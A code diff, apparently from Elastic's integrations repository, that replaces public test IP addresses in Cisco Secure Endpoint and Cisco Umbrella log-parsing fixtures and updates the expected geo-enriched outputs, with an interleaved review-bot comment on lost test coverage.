"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -3910,7 +3910,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3953,7 +3953,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3967,8 +3967,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:43.965588752Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+ "ingested": "2021-12-09T13:35:55.389171700Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -3990,7 +3990,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml
index f93ff929af0..6d67c67a9d9 100644
--- a/packages/cisco_secure_endpoint/manifest.yml
+++ b/packages/cisco_secure_endpoint/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_secure_endpoint
 title: Cisco Secure Endpoint (AMP)
-version: 0.2.0
+version: 0.2.1
 license: basic
 description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent.
 type: integration
diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml
index 1ebeb7d81eb..42403e4c385 100644
--- a/packages/cisco_umbrella/changelog.yml
+++ b/packages/cisco_umbrella/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.3.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "0.3.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log
index 3e5f23fced2..4d6b02fde1b 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log
@@ -1,2 +1,2 @@
-2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,ALLOW
-2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,BLOCK
+2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW
+2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
index ea95f0102ae..cbdc4dc63e4 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
@@ -2,23 +2,8 @@
 "expected": [
 {
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 36692,
- "organization": {
- "name": "Cisco OpenDNS, LLC"
- }
- },
- "address": "146.112.255.129",
- "ip": "146.112.255.129"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "rule": {
 "id": "12"
@@ -32,7 +17,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:9s/mgn3WChavy6kpCk25Ed4VCcU=",
+ "community_id": "1:7y0Rtnc087ycVA+d/fCa/8i5fTo=",
 "transport": "1",
 "direction": "outbound"
 },
@@ -47,12 +32,12 @@
 "related": {
 "ip": [
 "172.17.3.4",
- "146.112.255.129"
+ "67.43.156.12"
 ]
 },
 "event": {
- "ingested": "2021-09-13T18:11:30.813569215Z",
- "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,ALLOW",
+ "ingested": "2021-12-09T13:36:00.078901200Z",
+ "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW",
 "category": "network",
 "type": [
 "allowed"
@@ -71,23 +56,8 @@
 },
 {
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 36692,
- "organization": {
- "name": "Cisco OpenDNS, LLC"
- }
- },
- "address": "146.112.255.129",
- "ip": "146.112.255.129"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "rule": {
 "id": "12"
@@ -101,7 +71,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:9s/mgn3WChavy6kpCk25Ed4VCcU=",
+ "community_id": "1:7y0Rtnc087ycVA+d/fCa/8i5fTo=",
 "transport": "1",
 "direction": "inbound"
 },
@@ -116,12 +86,12 @@
 "related": {
 "ip": [
 "172.17.3.4",
- "146.112.255.129"
+ "67.43.156.12"
 ]
 },
 "event": {
- "ingested": "2021-09-13T18:11:30.813573577Z",
- "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,BLOCK",
+ "ingested": "2021-12-09T13:36:00.078910500Z",
+ "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK",
 "category": "network",
 "type": [
 "denied"
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log
index d777bb1c175..aa271ad3d86 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log
@@ -1,3 +1,3 @@
-"2020-07-23 23:49:54","elasticuser","elasticuser2,some other identity","192.168.1.1","8.8.8.8","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType",""
-"2020-07-23 23:50:25","elasticuser","elasticuser2,some other identity","192.168.1.1","4.4.4.4","Blocked","1 (A)","NOERROR","elastic.co.","Chat,Instant Messaging,Block List,Application","Test Policy Name","SomeIdentityType","BlockedCategories"
-"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","1.1.1.1","2.2.2.2","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users",""
+"2020-07-23 23:49:54","elasticuser","elasticuser2,some other identity","192.168.1.1","81.2.69.144","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType",""
+"2020-07-23 23:50:25","elasticuser","elasticuser2,some other identity","192.168.1.1","67.43.156.12","Blocked","1 (A)","NOERROR","elastic.co.","Chat,Instant Messaging,Block List,Application","Test Policy Name","SomeIdentityType","BlockedCategories"
+"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","67.43.156.12","81.2.69.144","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users",""
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json
index 4edff94c925..34b09248e46 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json
@@ -11,22 +11,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
- "ip": "8.8.8.8"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "source": {
 "address": "192.168.1.1",
@@ -50,13 +53,13 @@
 ],
 "ip": [
 "192.168.1.1",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "event": {
 "action": "dns-request-Allowed",
- "ingested": "2021-09-13T18:11:31.669497542Z",
- "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"8.8.8.8\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"",
+ "ingested": "2021-12-09T13:36:00.307612100Z",
+ "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"",
 "category": "network",
 "type": [
 "allowed",
@@ -89,23 +92,8 @@
 "response_code": "NOERROR"
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 3356,
- "organization": {
- "name": "Level 3 Parent, LLC"
- }
- },
- "address": "4.4.4.4",
- "ip": "4.4.4.4"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "source": {
 "address": "192.168.1.1",
@@ -129,13 +117,13 @@
 ],
 "ip": [
 "192.168.1.1",
- "4.4.4.4"
+ "67.43.156.12"
 ]
 },
 "event": {
 "action": "dns-request-Blocked",
- "ingested": "2021-09-13T18:11:31.669502149Z",
- "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"4.4.4.4\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"",
+ "ingested": "2021-12-09T13:36:00.307621100Z",
+ "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"67.43.156.12\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"",
 "category": "network",
 "type": [
 "denied",
@@ -170,40 +158,28 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 3215,
+ "number": 20712,
 "organization": {
- "name": "Orange"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "2.2.2.2",
- "ip": "2.2.2.2"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "source": {
- "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
- "location": {
- "lon": 143.2104,
- "lat": -33.494
- },
- "country_iso_code": "AU"
- },
- "as": {
- "number": 13335,
- "organization": {
- "name": "Cloudflare, Inc."
- }
- },
- "address": "1.1.1.1",
- "ip": "1.1.1.1"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "tags": [
 "preserve_original_event"
@@ -225,14 +201,14 @@
 "elastic.co."
 ],
 "ip": [
- "1.1.1.1",
- "2.2.2.2"
+ "67.43.156.12",
+ "81.2.69.144"
 ]
 },
 "event": {
 "action": "dns-request-Allowed",
- "ingested": "2021-09-13T18:11:31.669504232Z",
- "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"1.1.1.1\",\"2.2.2.2\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"",
+ "ingested": "2021-12-09T13:36:00.307627300Z",
+ "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"67.43.156.12\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"",
 "category": "network",
 "type": [
 "allowed",
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log
index 6200aeab3ae..927fc2bdb88 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log
@@ -1,2 +1,2 @@
-"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","8.8.8.8","0","Test Category"
-"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","8.8.8.8","445","Test Category"
+"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","81.2.69.144","0","Test Category"
+"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","81.2.69.144","445","Test Category"
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json
index 463e9c9a8dc..41f801dd7e7 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json
@@ -3,23 +3,26 @@
 {
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "source": {
 "port": 0,
@@ -41,13 +44,13 @@
 "related": {
 "ip": [
 "192.168.1.1",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "event": {
 "category": "network",
- "ingested": "2021-09-13T18:11:32.966577603Z",
- "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"8.8.8.8\",\"0\",\"Test Category\""
+ "ingested": "2021-12-09T13:36:00.633448800Z",
+ "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\""
 },
 "cisco": {
 "umbrella": {
@@ -61,23 +64,26 @@
 {
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 445,
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "source": {
 "port": 61095,
@@ -99,13 +105,13 @@
 "related": {
 "ip": [
 "192.168.1.1",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "event": {
 "category": "network",
- "ingested": "2021-09-13T18:11:32.966582547Z",
- "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"8.8.8.8\",\"445\",\"Test Category\""
+ "ingested": "2021-12-09T13:36:00.633453600Z",
+ "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"81.2.69.144\",\"445\",\"Test Category\""
 },
 "cisco": {
 "umbrella": {
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log
index 8cea4bb5599..13779918db7 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log
@@ -1,3 +1,3 @@
-"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
-"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
-"2017-10-02 23:52:53","elasticuser","ActiveDirectoryUserName,ADSite,Network","192.192.192.135","1.1.1.91","","","ALLOWED","http://google.com/the.js","www.google.com","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","200","562","1489","","","","","","","","","","Networks"
\ No newline at end of file
+"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","67.43.156.12","81.2.69.144","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
+"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","67.43.156.12","81.2.69.144","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming 
Computers",""
+"2017-10-02 23:52:53","elasticuser","ActiveDirectoryUserName,ADSite,Network","192.168.192.135","67.43.156.12","","","ALLOWED","http://google.com/the.js","www.google.com","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","200","562","1489","","","","","","","","","","Networks"
\ No newline at end of file
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json
index 902dbf2110f..0cfea734175 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json
@@ -3,26 +3,29 @@
 {
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
- "ip": "8.8.8.8"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "source": {
 "nat": {
- "ip": "1.1.1.1"
+ "ip": "67.43.156.12"
 },
 "address": "192.168.1.1",
 "ip": "192.168.1.1"
@@ -52,8 +55,8 @@
 ],
 "ip": [
 "192.168.1.1",
- "1.1.1.1",
- "8.8.8.8"
+ "67.43.156.12",
+ "81.2.69.144"
 ]
 },
 "http": {
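Review bot: The third proxy record's source `192.192.192.135` becomes the private `192.168.192.135` and its NAT address `1.1.1.91` becomes `67.43.156.12`, which the expected output shows is not geo/AS enriched, so the `source.geo`/`source.as` block the old fixture produced (removed in the `@@ -197,25 +203,10 @@` hunk of the expected file) disappears and no proxy-log record exercises source-side enrichment any more. The dnslogs change has the same effect on its third record (`1.1.1.1` → `67.43.156.12`), so across the cisco_umbrella fixtures only `destination.geo` remains covered. Keeping one record whose source or NAT address comes from the range the output shows is enriched (`81.2.69.144` resolves to GB-OXF) would preserve that coverage, e.g. `...,"192.168.192.135","81.2.69.144","","","ALLOWED",...` for this line.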
@@ -66,8 +69,8 @@
 }
 },
 "event": {
- "ingested": "2021-09-13T18:11:33.789721418Z",
- "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
+ "ingested": "2021-12-09T13:36:00.832430Z",
+ "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
 "category": "network",
 "type": [
 "allowed"
@@ -100,26 +103,29 @@
 {
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
- "ip": "8.8.8.8"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "source": {
 "nat": {
- "ip": "1.1.1.1"
+ "ip": "67.43.156.12"
 },
 "address": "192.168.1.1",
 "ip": "192.168.1.1"
@@ -149,8 +155,8 @@
 ],
 "ip": [
 "192.168.1.1",
